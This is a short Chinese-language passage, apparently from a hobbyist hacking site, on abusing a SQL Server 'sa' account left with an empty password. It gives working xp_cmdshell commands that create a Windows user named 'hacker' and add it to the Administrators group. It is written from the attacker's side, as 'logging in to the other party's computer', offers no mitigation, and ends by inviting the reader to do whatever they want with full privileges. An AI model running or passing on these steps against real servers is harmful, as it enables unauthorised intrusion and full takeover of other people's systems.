三、权限划分不当的危害

　　在新安装的SQL Server后，如果"sa"帐户，密码就为空，而且这个密码是SQL Server安全模块成员，享有最高的管理控制权，那么我们就可以用查询器或者OSQL登陆到对方的计算机上，前提是对方的数据库中　　xp_cmdshell stored procedure“扩展存储过程” 存在，默认是有的，（能让　　你这么容易的登陆上估计也不可能删除的）然后运行下面的命令：

　　Xp_cmdshell "net user hacker 123456 /ADD"

　　(增加一个名字为hacker密码为123456的用户)

　　然后在：

　　Xp_cmdshell "net localgroup Administrators hacker /ADD"

　　(给刚才增加的hacker用户，添加到Administrators组中)

　　这样攻击者就成功的在SQL SERVER上增加了一个windows用户,而且有最高权限，

　　然后做什么呢？这个问题自己想吧，有了最高权限，想做什么就做什么吧。

===================
欢迎访问盼盼的家园(www.panpan.org)